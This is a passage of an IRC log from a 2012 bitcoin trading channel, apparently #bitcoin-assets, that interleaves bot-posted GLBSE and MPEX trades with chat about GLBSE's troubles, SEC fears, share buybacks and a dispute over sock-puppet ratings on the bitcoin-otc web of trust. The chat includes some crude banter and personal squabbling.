glbse code system is not really a valid way to move assets off the exchange Sep 26 16:45:19 there are trust issues here, esp if people try to use the code more than once. Sep 26 16:46:09 it will be honestly pretty hard to deal with the assets if nefario will not cooperate Sep 26 16:47:24 in any event i will keep all the coin and dividends and make good once nefario relists or we find a differnt workable option Sep 26 16:47:48 lol, not even here... Sep 26 16:53:56 :) Sep 26 16:55:22 [MPEX] [S.MPOE] 10803 @ 0.00036031 = 3.8924 BTC [-] Sep 26 16:55:23 [MPEX] [S.MPOE] 6197 @ 0.00035986 = 2.2301 BTC [-] Sep 26 17:11:42 [GLBSE] [ASICMINER] 1 @ 0.115689 BTC [-] Sep 26 17:13:03 [GLBSE] [ASICMINER] 1 @ 0.115689 BTC [-] Sep 26 17:18:42 [GLBSE] [TEEK.USD] 1 @ 0.0777 BTC [+] Sep 26 17:20:54 [MPEX] [S.MPOE] 5803 @ 0.00035986 = 2.0883 BTC [-] Sep 26 17:20:56 [MPEX] [S.MPOE] 35826 @ 0.00035876 = 12.8529 BTC [-] Sep 26 17:20:57 [MPEX] [S.MPOE] 23736 @ 0.00035845 = 8.5082 BTC [-] Sep 26 17:29:33 LKSPLHJFRNODAAEXAEDJYRJBJWRUMKDP Sep 26 17:29:42 here's my claim code goat Sep 26 17:29:46 hook it up dude Sep 26 17:32:55 [GLBSE] [NYAN.A] 1 @ 0.98 BTC [-] Sep 26 17:33:54 [GLBSE] [NYAN.A] 7 @ 0.98 = 6.86 BTC [-] Sep 26 17:35:23 [GLBSE] [FPGAMINING] 1 @ 0.3 BTC [-] Sep 26 17:35:24 [GLBSE] [FPGAMINING] 1 @ 0.24 BTC [-] Sep 26 17:35:25 [GLBSE] [FPGAMINING] 1 @ 0.2202 BTC [-] Sep 26 17:35:26 [GLBSE] [FPGAMINING] 7 @ 0.22000001 = 1.54 BTC [-] Sep 26 17:35:28 [GLBSE] [FPGAMINING] 10 @ 0.22 = 2.2 BTC [-] Sep 26 17:35:29 [GLBSE] [FPGAMINING] 1 @ 0.21357 BTC [-] Sep 26 17:35:30 [GLBSE] [FPGAMINING] 9 @ 0.21337 = 1.9203 BTC [-] Sep 26 17:35:34 ouch Sep 26 17:35:49 Glad I got out of that at .6 Sep 26 17:40:19 [GLBSE] [BITBOND] 3 @ 0.35833999 = 1.075 BTC [+] Sep 26 17:40:21 [GLBSE] [BITBOND] 1 @ 0.35834 BTC [+] Sep 26 17:40:22 [GLBSE] [BITBOND] 1 @ 0.35855 BTC [+] Sep 26 17:40:22 [GLBSE] [BITBOND] 1 @ 0.35876 BTC [+] Sep 26 17:40:24 [GLBSE] [BITBOND] 1 @ 0.35897 BTC [+] Sep 26 17:40:25 [GLBSE] [BITBOND] 1 @ 0.35918 BTC [+] Sep 26 17:40:26 [GLBSE] [BITBOND] 1 @ 0.35939 BTC [+] Sep 26 17:40:27 [GLBSE] [BITBOND] 1 @ 0.3596 BTC [+] Sep 26 17:43:38 [GLBSE] [GIGAMINING] 1 @ 0.63479999 BTC [-] Sep 26 17:43:40 [GLBSE] [GIGAMINING] 1 @ 0.6348 BTC [+] Sep 26 17:43:41 [GLBSE] [GIGAMINING] 4 @ 0.635 = 2.54 BTC [+] Sep 26 17:46:04 [MPEX] [S.MPOE] 26057 @ 0.00035845 = 9.3401 BTC [-] Sep 26 17:46:06 [MPEX] [S.MPOE] 16927 @ 0.00035819 = 6.0631 BTC [-] Sep 26 17:46:06 [MPEX] [S.MPOE] 19216 @ 0.00035816 = 6.8824 BTC [-] Sep 26 17:51:34 [GLBSE] [BFLS] 1 @ 0.57009999 BTC [+] Sep 26 18:11:19 [MPEX] [F.GIGA.ETF] 1046 @ 0.00044037 = 0.4606 BTC [+] Sep 26 18:11:23 [MPEX] [F.GIGA.ETF] 4354 @ 0.00044037 = 1.9174 BTC [+] Sep 26 18:13:51 why? Sep 26 18:14:24 demand from? Sep 26 18:22:01 usagi: nefario finally emailed me and said my account is unlocked Sep 26 18:22:02 so Sep 26 18:22:06 oh guys please ignore each other =( Sep 26 18:22:32 Im going to bed Sep 26 18:22:33 night all Sep 26 18:27:59 Its that time of the day again. Sep 26 18:30:10 Allways it's that time of the day... Sep 26 18:30:21 This is getting tiresome already Sep 26 18:32:32 Anyne know a guy that goes under the forum name "theboss" can this guy be trusted? Sep 26 18:40:43 what's going on now :P Sep 26 18:41:58 More drama Sep 26 18:45:45 ... Dramacoin Sep 26 18:46:09 The whole SEC thing though, that's the scary part. Sep 26 18:46:19 it will be interesting to see what will happen to GLBSE and all the issuers on GLBSE Sep 26 18:54:59 How is life in ponziland Sep 26 18:55:53 Now with the SEC, is when it turns into scarycoin Sep 26 18:55:59 due to SEC issuers as goat can get a heavy life Sep 26 18:56:09 :D Sep 26 18:56:21 all the fake issuers though Sep 26 18:59:05 NO more ponziland on glbse Sep 26 19:02:18 [MPEX] [F.GIGA.ETF] 1200 @ 0.00044037 = 0.5284 BTC [+] Sep 26 19:02:28 knowing the SEC, btc will be at $132 in 2015 before they get around to doing anything Sep 26 19:03:10 http://www.youtube.com/watch?v=Aht9hcDFyVw Sep 26 19:04:11 and now the end is near, and so I face the final....... Sep 26 19:14:32 [GLBSE] [GIGAMINING] 1 @ 0.60020001 BTC [-] Sep 26 19:16:58 [GLBSE] [CPA] 5 @ 0.03499999 = 0.175 BTC [+] Sep 26 19:17:00 [GLBSE] [CPA] 6 @ 0.03598 = 0.2159 BTC [+] Sep 26 19:17:02 [GLBSE] [GIGAMINING] 1 @ 0.61989999 BTC [+] Sep 26 19:17:42 [GLBSE] [NYAN.A] 15 @ 0.98 = 14.7 BTC [-] Sep 26 19:17:44 [GLBSE] [NYAN.A] 50 @ 0.99 = 49.5 BTC [+] Sep 26 19:19:44 [GLBSE] [FPGAMINING] 2 @ 0.21357001 = 0.4271 BTC [+] Sep 26 19:19:46 [GLBSE] [FPGAMINING] 8 @ 0.21357 = 1.7086 BTC [-] Sep 26 19:19:47 [GLBSE] [FPGAMINING] 1 @ 0.2134 BTC [-] Sep 26 19:19:48 [GLBSE] [FPGAMINING] 4 @ 0.21337 = 0.8535 BTC [-] Sep 26 19:20:38 [GLBSE] [OBSI.HRPT] 33 @ 0.05899999 = 1.947 BTC [+] Sep 26 19:23:42 [GLBSE] [ARS] 50 @ 0.0159 = 0.795 BTC [+] Sep 26 19:23:44 [GLBSE] [ARS] 20 @ 0.016 = 0.32 BTC [+] Sep 26 19:25:35 usagi need a time off from bitcointalk Sep 26 19:26:11 huh? Sep 26 19:26:40 and your point is? Sep 26 19:26:46 can you even get one out? Sep 26 19:26:59 except using foul language Sep 26 19:27:22 [MPEX] [S.MPOE] 24470 @ 0.00035939 = 8.7943 BTC [+] Sep 26 19:27:24 [MPEX] [S.MPOE] 32930 @ 0.00036069 = 11.8775 BTC [+] Sep 26 19:28:08 [GLBSE] [ASICMINER] 11 @ 0.11557 = 1.2713 BTC [-] Sep 26 19:32:08 [GLBSE] [GIGAMINING] 6 @ 0.6199 = 3.7194 BTC [+] Sep 26 19:34:13 so tell me why does your book states that you're Oliver? You confirmed in a forum post that it was your name? Are you roleplaying a female? Sep 26 19:35:10 Rally? Did someone say RALLY?!?! Sep 26 19:35:14 YAY I'M RICH Sep 26 19:35:41 Quote from usagi: "I wrote several books, including highschool textbooks and some free books on Go on the internet using my real name." Sep 26 19:36:11 So are you transgendered? Sep 26 19:36:57 I don't really see why usagi's gender is relevant to anything Sep 26 19:37:47 Who was following you for 15 years? Sep 26 19:38:25 EskimoBob: lapsang souchong, I hope Sep 26 19:40:11 ;;sell 1 "kick in the taint" @ -0.02 BTC I'll kick someone in the taint and/or add my two bitcents. Just whatever this is fake. Sep 26 19:40:12 Order id 10369 created. Sep 26 19:47:08 do you vote with shares that belong to you? Sep 26 19:48:31 Do you make this information public, i.e. how many shares of BMF you own? Sep 26 19:50:10 it's very uncommon for administration to vote with shares they own Sep 26 19:50:19 if a company repurchases shares, they explicitly lose their voting rights Sep 26 19:51:12 then it should be disclosed that the voting process that it's meaningless Sep 26 19:52:37 [MPEX] [F.GIGA.ETF] 529 @ 0.00044037 = 0.233 BTC [+] Sep 26 19:56:46 coingenuity bakewell is some guy on the forums. runs some fund on glbse Sep 26 19:56:57 800 shares is 8%? If 10,000 were issued Sep 26 19:58:31 [GLBSE] [ASICMINER] 2 @ 0.11557 = 0.2311 BTC [-] Sep 26 19:59:05 Ok, thanks. Sep 26 19:59:27 oh shit, vampireb's gonna suck all of usagi's blood Sep 26 20:00:51 ;;ticker Sep 26 20:00:52 Best bid: 12.17704, Best ask: 12.207, Bid-ask spread: 0.02996, Last trade: 12.207, 24 hour volume: 18558, 24 hour low: 12.02, 24 hour high: 12.22909 Sep 26 20:05:40 [GLBSE] [ASICMINER] 1 @ 0.11557 BTC [-] Sep 26 20:09:23 [GLBSE] [GIGAMINING] 4 @ 0.60030001 = 2.4012 BTC [-] Sep 26 20:09:46 [GLBSE] [ASICMINER] 36 @ 0.1101 = 3.9636 BTC [-] Sep 26 20:09:48 [GLBSE] [ASICMINER] 85 @ 0.11 = 9.35 BTC [-] Sep 26 20:09:49 [GLBSE] [ASICMINER] 2 @ 0.1076 = 0.2152 BTC [-] Sep 26 20:09:50 [GLBSE] [ASICMINER] 2 @ 0.1075 = 0.215 BTC [-] Sep 26 20:09:52 [GLBSE] [ASICMINER] 2 @ 0.107 = 0.214 BTC [-] Sep 26 20:09:52 [GLBSE] [ASICMINER] 2 @ 0.10640101 = 0.2128 BTC [-] Sep 26 20:09:53 [GLBSE] [ASICMINER] 21 @ 0.106301 = 2.2323 BTC [-] Sep 26 20:09:54 [GLBSE] [ASICMINER] 12 @ 0.1063 = 1.2756 BTC [-] Sep 26 20:09:55 [GLBSE] [ASICMINER] 14 @ 0.10501 = 1.4701 BTC [-] Sep 26 20:09:57 [GLBSE] [ASICMINER] 8 @ 0.10470648 = 0.8377 BTC [-] Sep 26 20:09:58 [GLBSE] [ASICMINER] 25 @ 0.10400092 = 2.6 BTC [-] Sep 26 20:09:59 [GLBSE] [ASICMINER] 50 @ 0.10399991 = 5.2 BTC [-] Sep 26 20:10:00 [GLBSE] [ASICMINER] 141 @ 0.1039999 = 14.664 BTC [-] Sep 26 20:10:39 hi mircea, brokerage is finally online for betatest (see topic) Sep 26 20:13:32 yeee Sep 26 20:13:38 i dropped the url a few places. Sep 26 20:15:23 [GLBSE] [ASICMINER] 2 @ 0.1099 = 0.2198 BTC [+] Sep 26 20:16:59 good, i got few ppl already Sep 26 20:17:48 [MPEX] [S.MPOE] 10300 @ 0.0003588 = 3.6956 BTC [-] Sep 26 20:26:05 jurov: cool, can i have an invitation code? Sep 26 20:29:26 yuck Sep 26 20:29:37 the forum is enough Sep 26 20:37:49 join #bitcoin-drama Sep 26 20:38:26 There it is, enjoy Sep 26 20:40:10 [GLBSE] [SILVER] 12 @ 0.009939 = 0.1193 BTC [+] Sep 26 20:41:02 the forum is garbage and you both effectively prove it by doing this publicly Sep 26 20:41:05 just a little hint Sep 26 20:41:20 [GLBSE] [GOLD] 7 @ 0.00996 = 0.0697 BTC [+] Sep 26 20:41:54 [GLBSE] [GIGAMINING] 1 @ 0.6002 BTC [-] Sep 26 20:42:08 jcpham are they still at it ? Sep 26 20:42:18 apparently Sep 26 20:42:29 Now you can choose, guys, do you want to follow this on #bitcoin-drama or #bitcoin-tragedy Sep 26 20:42:34 It's up to you :) Sep 26 20:42:36 [GLBSE] [GIGAMINING] 1 @ 0.60000001 BTC [-] Sep 26 20:42:37 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [-] Sep 26 20:42:39 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [-] Sep 26 20:42:40 [GLBSE] [GIGAMINING] 7 @ 0.5901 = 4.1307 BTC [-] Sep 26 20:42:47 reminds me of TMZ Sep 26 20:42:48 [GLBSE] [CPA] 3 @ 0.054 = 0.162 BTC [+] Sep 26 20:42:54 [MPEX] [S.MPOE] 24670 @ 0.00036069 = 8.8982 BTC [+] Sep 26 20:42:56 [MPEX] [S.MPOE] 32231 @ 0.00036145 = 11.6499 BTC [+] Sep 26 20:43:02 i think they just should fuck each other irl instead of using fuck in every other sentence Sep 26 20:43:40 maybe they don;t have strap-ons in their country. Sep 26 20:44:06 a new GLBSE business idea? Sep 26 20:44:31 bitdildos is sexy idea Sep 26 20:44:43 [GLBSE] [GIGAMINING] 1 @ 0.5901 BTC [-] Sep 26 20:44:45 [GLBSE] [GIGAMINING] 1 @ 0.59 BTC [-] Sep 26 20:44:46 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Sep 26 20:44:47 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Sep 26 20:44:48 [GLBSE] [GIGAMINING] 1 @ 0.5682 BTC [-] Sep 26 20:45:27 NEXTCLUSTERFUCK is a guaranteed... Sep 26 20:45:48 [GLBSE] [GIGAMINING] 4 @ 0.568 = 2.272 BTC [-] Sep 26 20:46:54 [GLBSE] [PUREMINING] 1 @ 0.099 BTC [-] Sep 26 20:47:48 [GLBSE] [GSDPT] 670 @ 0.0033994 = 2.2776 BTC [+] Sep 26 20:54:58 [MPEX] [O.BTCUSD.P130T] 885 @ 0.07371346 = 65.2364 BTC [-] Sep 26 20:56:47 sweet Sep 26 20:56:53 enjoy the smoky bacony goodness Sep 26 20:56:55 [MPEX] [O.BTCUSD.P070T] 10 @ 0.03016632 = 0.3017 BTC [+] Sep 26 20:56:57 I might make myself some now Sep 26 20:57:26 [MPEX] [O.BTCUSD.P060T] 10 @ 0.02374832 = 0.2375 BTC [-] Sep 26 20:57:31 [MPEX] [O.BTCUSD.P050T] 10 @ 0.02300619 = 0.2301 BTC [-] Sep 26 21:02:36 [GLBSE] [ASICMINER] 59 @ 0.1039999 = 6.136 BTC [-] Sep 26 21:02:37 [GLBSE] [ASICMINER] 1 @ 0.103 BTC [-] Sep 26 21:02:39 [GLBSE] [ASICMINER] 45 @ 0.102 = 4.59 BTC [-] Sep 26 21:02:40 [GLBSE] [ASICMINER] 3 @ 0.1011 = 0.3033 BTC [-] Sep 26 21:02:41 [GLBSE] [ASICMINER] 5 @ 0.10000001 = 0.5 BTC [-] Sep 26 21:02:42 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC [-] Sep 26 21:02:43 [GLBSE] [ASICMINER] 47 @ 0.1 = 4.7 BTC [-] Sep 26 21:08:50 I need anyone with OBSI.ABMO shares to contact me today. Sep 26 21:09:46 This is a chance to sell them to me at 0.1 BTC before I finish the liquidation and buyback at ~0.09xxx Sep 26 21:11:10 abmo going away ? Sep 26 21:11:43 I'm offering this because DMC got in at ~0.04 DMC is not eligible for this offer Sep 26 21:12:11 it's a majority shareholder and is hurting the buyback for the small shareholders that recently bought in at 0.1 Sep 26 21:13:25 im not following Sep 26 21:14:05 ... Sep 26 21:14:18 how on earth do you pay 100% roi weekly? Sep 26 21:14:32 secret sauce Sep 26 21:14:57 [14:13:26] I'm going to open up a new issue... SMV.LEGIT.PI ... dividends will be x3.14159 weekly... [14:13:46] Smoov; what do shares cost? :) Sep 26 21:14:58 [14:13:56] 3.14159 Sep 26 21:15:15 the heck? Sep 26 21:15:21 that makes even less sense Sep 26 21:16:11 you gun have a bad tiem Sep 26 21:16:36 I can't seem to comprehend. there's no way Sep 26 21:16:59 huh? Sep 26 21:17:36 I have worked on this asset, I pay out 50000% a week. How I do it is a secret and I can't guarantee that I can return your investment. Sep 26 21:17:36 and here's where someone says "YHBT" Sep 26 21:17:51 What time does nefario usually get on IRC? Sep 26 21:18:56 [GLBSE] [BITBOND] 1 @ 0.3596 BTC [+] Sep 26 21:20:04 [GLBSE] [OBSI.HRPT] 1 @ 0.05997 BTC [+] Sep 26 21:20:32 can you haul a meth lab around? Sep 26 21:20:58 I know this guy Walter, might be interested Sep 26 21:22:33 yeah sucks having to wait till next summer to see Sep 26 21:22:39 [MPEX] [F.GIGA.ETF] 6200 @ 0.00044037 = 2.7303 BTC [+] Sep 26 21:23:52 trucking industry been bleeding like crazy. 10-15 years it's all be google trucks automated delivery drivers Sep 26 21:25:27 good luck with it, needs to be more IRL biz on the exchanges Sep 26 21:25:33 [GLBSE] [OBSI.HRPT] 2 @ 0.06071 = 0.1214 BTC [+] Sep 26 21:25:35 [GLBSE] [OBSI.HRPT] 8 @ 0.06073871 = 0.4859 BTC [+] Sep 26 21:27:12 ideally in 10-15 years there's no more trucks Sep 26 21:27:19 trains are cheaper, more efficient and take electric Sep 26 21:27:25 main issue is the BTC price climbing hurting returns... need an exchange that accepts USD and autoconverts it to BTC on the fly Sep 26 21:28:08 As stated elsewhere, GLBSE is not located in the U.S. The SEC can not shut down GLBSE any more than they can shut down the London Stock Exchange. Sep 26 21:28:19 I want my Jetson delivery tubes Sep 26 21:28:19 did i mention the forums are funnay ? Sep 26 21:29:45 not if you're running in USD Sep 26 21:30:27 same problem with mining equipment, my singles priced in USD held my OBSI.ABMO NAV down everytime the price climbed Sep 26 21:31:51 That's what I'm saying... an exchange linked with BitPay would be ideal for fiat denominated investments Sep 26 21:32:40 then you don't even have to deal with the "I coulda held BTC and made 1000% more!" trolls Sep 26 21:33:46 Obsi no, you have to deal with the stone silence of "we don't care about your thing, if we wanted to buy dollar stocks we'd use a real broker" Sep 26 21:35:47 start a whole supply chain using only BTC Sep 26 21:36:01 ;;seen Diablo-D3 Sep 26 21:36:01 Diablo-D3 was last seen in #bitcoin-assets 3 hours, 13 minutes, and 29 seconds ago: night all Sep 26 21:36:30 not if you start from the ground up, I could see it being done Sep 26 21:36:46 especially with the opensource mining equipment coming on the scene Sep 26 21:36:58 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.09268647 = 92.6865 BTC [+] Sep 26 21:37:38 ;;seen nefario Sep 26 21:37:38 nefario was last seen in #bitcoin-assets 1 day, 22 hours, 37 minutes, and 48 seconds ago: Those assets are not listed or traded anymore Sep 26 21:37:40 [GLBSE] [OBSI.HRPT] 1 @ 0.06073871 BTC [+] Sep 26 21:40:17 mining, logging, farming all started using only BTC, accepting only BTC payments for their goods, then you build the layers of manufacturing & distribution on top of that Sep 26 21:41:50 [MPEX] [S.MPOE] 15000 @ 0.00036145 = 5.4218 BTC [+] Sep 26 21:43:06 it would be rough, but it would make bitcoin rock solid once it was fleshed out Sep 26 21:53:36 guruvan glbse can't make any management changes. the reason they are stuck with the current idiot there is that nobody competent is willing to work for free. Sep 26 21:53:45 the 50-100 btc they clear a month doesn't even cover server costs, so... Sep 26 21:54:48 [GLBSE] [BMF] 1 @ 0.4999 BTC [+] Sep 26 21:54:49 [GLBSE] [BMF] 2 @ 0.5 = 1 BTC [+] Sep 26 22:06:53 [MPEX] [S.MPOE] 3000 @ 0.00036145 = 1.0844 BTC [+] Sep 26 22:08:23 [GLBSE] [ASICMINER] 1 @ 0.103 BTC [+] Sep 26 22:08:25 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC [-] Sep 26 22:08:26 [GLBSE] [ASICMINER] 500 @ 0.1 = 50 BTC [-] Sep 26 22:11:48 [GLBSE] [GIGAMINING] 2 @ 0.6197 = 1.2394 BTC [+] Sep 26 22:22:37 Sold of 1000 ASICMINER shares for 0.122 buys them back for 0.1 score :D Sep 26 22:22:48 [GLBSE] [BAKEWELL] 2 @ 0.1499999 = 0.3 BTC [+] Sep 26 22:22:49 [GLBSE] [BAKEWELL] 100 @ 0.15 = 15 BTC [+] Sep 26 22:22:52 buying more? Sep 26 22:23:09 might be interested in buying some more later on :P Sep 26 22:26:09 why so? Sep 26 22:28:16 My ASICMINER stakes varies between 500 - 2500 Sep 26 22:31:57 [MPEX] [S.MPOE] 15200 @ 0.00036128 = 5.4915 BTC [-] Sep 26 22:32:13 o hey, did everyone hear ? glbse is organising a new bitcoin conference Sep 26 22:32:19 this time it's held in new york. Sep 26 22:32:25 3 World Financial Center, Suite 400 Sep 26 22:33:00 lol Sep 26 22:34:59 mircea_popescu: http://bit.ly/TCt3Jw Sep 26 22:36:01 > glbse is organising a new bitcoin conference Sep 26 22:36:05 That makes three. Sep 26 22:36:50 well, at this one they stand a chance of actually having some btc names. Sep 26 22:37:15 (three, as in the number of rumors about conferences/bitcoin events to occur in the U.S. over the next year) Sep 26 22:37:49 sgornick: he was making a joke. That is the SEC offices Sep 26 22:38:14 ty ty. just, obsi's a hater :D Sep 26 22:38:54 no, just think time is better spent improving one's own concerns instead of commenting on competitors Sep 26 22:39:26 all work and no play... Sep 26 22:42:01 i'm not for bashing competitors Sep 26 22:42:04 however, religious admiration for nefario in large part of community is not matched by actual performance Sep 26 22:44:10 [GLBSE] [PUREMINING] 3 @ 0.098 = 0.294 BTC [-] Sep 26 22:45:04 they don't think it be like it is, but it do. Sep 26 22:47:42 I think this thing with Goat is going to be the first death knell for GLBSE Sep 26 22:47:54 Up until now, GLBSE was a fairly free market Sep 26 22:47:58 Now it's closing up Sep 26 22:48:43 Luceo interestingly enough, diablo's thing was a prologue Sep 26 22:49:57 did anyone watch his talk at the conference? Sep 26 22:50:00 http://youtu.be/vmPD_YSQ--k Sep 26 22:50:06 mod6 mpoe-pr did Sep 26 22:50:11 her job sucks most of the time. Sep 26 22:50:18 haha Sep 26 22:50:23 i lul'd a bit Sep 26 22:57:07 [MPEX] [F.GIGA.ETF] 1600 @ 0.00044037 = 0.7046 BTC [+] Sep 26 22:57:30 Anyone has BIB.BVPS/S.BVPS shares? or DMC or Gigamining? Sep 26 22:58:04 i have bvps Sep 26 22:58:27 Aye, just looking around for a seller Sep 26 22:58:55 o thought you wanted to short lol Sep 26 22:59:14 makes more sense to put bids in if you want to buy neh ? Sep 26 22:59:34 I do but there's not many sell offer and they're all pretty high Sep 26 23:00:21 [GLBSE] [COGNITIVE] 11 @ 0.3601 = 3.9611 BTC [-] Sep 26 23:00:23 [GLBSE] [COGNITIVE] 6 @ 0.36 = 2.16 BTC [-] Sep 26 23:01:20 at mpex? or else? Sep 26 23:01:46 BTC-Mining well if you have good volume maybe you move mkt. many ppl don't sell / buy on glbse cayse low volumes on book Sep 26 23:01:49 Hey usagi, I've attracted my own hater on bitcointalk <3 Sep 26 23:02:10 Now I too know what it's like to have my threads stalked by a raving hysterical idiot Sep 26 23:02:46 usagi: Nah this guy's had an issue with me for a while Sep 26 23:04:32 [GLBSE] [BDK.BND] 1 @ 0.07002001 BTC [-] Sep 26 23:04:34 [GLBSE] [BDK.BND] 2 @ 0.07002 = 0.14 BTC [-] Sep 26 23:04:35 [GLBSE] [BDK.BND] 8 @ 0.07 = 0.56 BTC [-] Sep 26 23:04:36 [GLBSE] [BDK.BND] 2 @ 0.06602 = 0.132 BTC [-] Sep 26 23:04:38 [GLBSE] [BDK.BND] 1 @ 0.06102 BTC [-] Sep 26 23:04:39 [GLBSE] [BDK.BND] 1 @ 0.06002 BTC [-] Sep 26 23:04:39 [GLBSE] [BDK.BND] 5 @ 0.06 = 0.3 BTC [-] Sep 26 23:04:40 [GLBSE] [BDK.BND] 1 @ 0.05002 BTC [-] Sep 26 23:04:58 Luceo who ? Sep 26 23:09:07 Well to anyone willing to sell BVPS shares, I'm offering 0.0031 a piece Sep 26 23:10:06 mircea_popescu: gweedo Sep 26 23:10:25 never heard o' him Sep 26 23:10:32 usagi: https://bitcointalk.org/index.php?topic=112445.0 Sep 26 23:12:11 mircea_popescu: He's pretty stupid :P Sep 26 23:12:23 Doesn't even read the post he's trolling Sep 26 23:12:24 my loss then :p Sep 26 23:14:26 [GLBSE] [OBSI.HRPT] 10 @ 0.06073871 = 0.6074 BTC [+] Sep 26 23:14:37 BTC-Mining, why not just put order at mpex directly? Sep 26 23:15:57 i was asking that Sep 26 23:16:06 apparently he thinks he can get a better deal otc-ish Sep 26 23:22:41 [MPEX] [S.MPOE] 8781 @ 0.00036145 = 3.1739 BTC [+] Sep 26 23:22:42 [MPEX] [S.MPOE] 31900 @ 0.00036178 = 11.5408 BTC [+] Sep 26 23:22:43 [MPEX] [S.MPOE] 22424 @ 0.00036294 = 8.1386 BTC [+] Sep 26 23:27:36 [GLBSE] [NYAN.B] 5 @ 0.987799 = 4.939 BTC [+] Sep 26 23:27:37 [GLBSE] [NYAN.B] 17 @ 0.98779999 = 16.7926 BTC [+] Sep 26 23:27:55 (rate []) -- Enters a rating for in the amount of . Use optional field to enter any notes you have about this user. must be the user's GPG-registered username, Your previously existing rating, if any, will be overwritten. Sep 26 23:28:09 No, I just find that there's few sellers around Sep 26 23:28:35 Selling it, so I ask here to see if anyone has any they would be willing to sell. Sep 26 23:30:39 ;;getrating EskimoBob Sep 26 23:30:40 WARNING: Currently not authenticated. User eskimobob, rated since Sat Jun 4 09:35:57 2011. Cumulative rating 1, from 4 total ratings. Received ratings: 3 positive, 1 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=eskimobob Sep 26 23:31:00 no problem Sep 26 23:32:08 15081 Usagi 43 eskimobob 2012-09-24 18:51:24 -2 broke his word on a contract. untrustworthy and a bit of a jerk. Sep 26 23:32:49 ;;getrating Eisenhower34 Sep 26 23:32:49 This user has not yet been rated. WARNING: Currently not authenticated. Sep 26 23:32:52 Yeah, but didn't he pay you for your silence? Sep 26 23:32:52 Not really, you sold your silence and than didn't keep to it Sep 26 23:33:04 I think it's pretty sad that you cant keep a bargain Sep 26 23:33:15 [GLBSE] [OBSI.HRPT] 10 @ 0.06073871 = 0.6074 BTC [+] Sep 26 23:33:16 [GLBSE] [OBSI.HRPT] 1 @ 0.06073872 BTC [+] Sep 26 23:33:18 [GLBSE] [OBSI.HRPT] 20 @ 0.06494999 = 1.299 BTC [+] Sep 26 23:33:19 [GLBSE] [OBSI.HRPT] 26 @ 0.06495 = 1.6887 BTC [+] Sep 26 23:33:20 [GLBSE] [OBSI.HRPT] 18 @ 0.06498 = 1.1696 BTC [+] Sep 26 23:33:29 He rates you? Sep 26 23:33:41 I've given up on the WOT :P Sep 26 23:33:44 Coolio- -50'd me Sep 26 23:33:51 for calling him a scammer Sep 26 23:34:04 Yes, he is Sep 26 23:34:09 But he made 5 sock puppets Sep 26 23:34:13 and -10'd me on each one Sep 26 23:34:21 ;;getrating Luceo Sep 26 23:34:21 Currently authenticated from hostmask Luceo!~Luc3o@gateway/tor-sasl/luceo . User Luceo, rated since Tue Jun 12 11:09:09 2012. Cumulative rating 24, from 50 total ratings. Received ratings: 44 positive, 6 negative. Sent ratings: 52 positive, 5 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Luceo Sep 26 23:34:49 11808 Coolio- 17 Luceo 2012-09-25 21:00:09 -10 Sep 26 23:34:50 15217 noulol 10 Luceo 2012-09-25 20:56:26 -10 should mind his own fucking business Sep 26 23:34:51 15223 [nin] -6 Luceo 2012-09-25 20:58:22 -10 should mind his own fucking business Sep 26 23:34:53 15230 BrutusRex -10 Luceo 2012-09-25 20:59:19 -10 should mind his own fucking business Sep 26 23:34:56 15239 wolf13 -10 Luceo 2012-09-25 21:02:19 -10 should mind his own fucking business Sep 26 23:34:58 usagi: No, doesn't look like it Sep 26 23:35:05 That's completly abusive... Sep 26 23:35:42 ;;rate noulol -10 Coolio- sockpuppet Sep 26 23:35:43 Rating entry successful. Your rating of -10 for user noulol has been recorded. Sep 26 23:35:52 whos that ? Sep 26 23:35:58 [GLBSE] [OBSI.HRPT] 5 @ 0.06498 = 0.3249 BTC [+] Sep 26 23:36:02 ;;rate [nin] -10 Coolio- sockpuppet Sep 26 23:36:02 Error: "nin" is not a valid command. Sep 26 23:36:23 ;;rate BrutusRex -10 Coolio- sockpuppet Sep 26 23:36:24 "[nin]" maybe Sep 26 23:36:24 Rating entry successful. Your rating of -10 for user BrutusRex has been recorded. Sep 26 23:36:36 use ;;rate "[nin]" -10 Coolio- sockpuppet Sep 26 23:36:39 ;;rate wolf13 -10 Coolio- sockpuppet Sep 26 23:36:40 Rating entry successful. Your rating of -10 for user wolf13 has been recorded. Sep 26 23:36:57 ;;rate "[nin]" -10 Coolio- sockpuppet Sep 26 23:36:58 Rating entry successful. Your rating of -10 for user [nin] has been recorded. Sep 26 23:37:13 [GLBSE] [FPGAMINING] 9 @ 0.4075997 = 3.6684 BTC [+] Sep 26 23:37:17 I can only suggest that everyone downrates coolio and his sockie so he cant scam anyone else Sep 26 23:37:25 o, more coolio Sep 26 23:37:37 Though he will just uprate himself with more sockies Sep 26 23:38:32 Code an alternative to gribble WOT Sep 26 23:38:47 Which requires both users to confirm a trade, and trade value BEFORE they trade Sep 26 23:38:53 And then to rate after they trade Sep 26 23:39:12 But gribble WOT is controlled by nanotube, and nanotube doesn't want to change it Sep 26 23:40:21 The thing is Sep 26 23:40:31 The fact that he downrated me isn't THAT bad Sep 26 23:40:37 The fact that he uprated himself +40 Sep 26 23:40:38 i worked on my ratings Sep 26 23:40:39 on the other hand Sep 26 23:40:43 is going to get people scammed Sep 26 23:40:48 there have been many people who tried to - me Sep 26 23:40:56 but sometimes you have to suck it up and do what sbest for your rating Sep 26 23:41:39 rg: What's best for my rating is a moderator removing the -50 coolio has put on it :) Sep 26 23:41:41 Wont happen though Sep 26 23:41:52 nanotube doesnt modify ratings Sep 26 23:41:53 ever Sep 26 23:41:53 [GLBSE] [MOVETO.FUND] 1 @ 0.795 BTC [-] Sep 26 23:41:54 [GLBSE] [MOVETO.FUND] 1 @ 0.76 BTC [-] Sep 26 23:41:55 Neither will anyone remove the +40 he's given himself Sep 26 23:41:57 that's why the system works Sep 26 23:42:04 [GLBSE] [BFLS] 1 @ 0.40000001 BTC [-] Sep 26 23:42:04 well Sep 26 23:42:05 [GLBSE] [BFLS] 1 @ 0.4 BTC [-] Sep 26 23:42:07 [GLBSE] [BFLS] 7 @ 0.36 = 2.52 BTC [-] Sep 26 23:42:11 its a bad situation Sep 26 23:42:19 the system works? wow... Sep 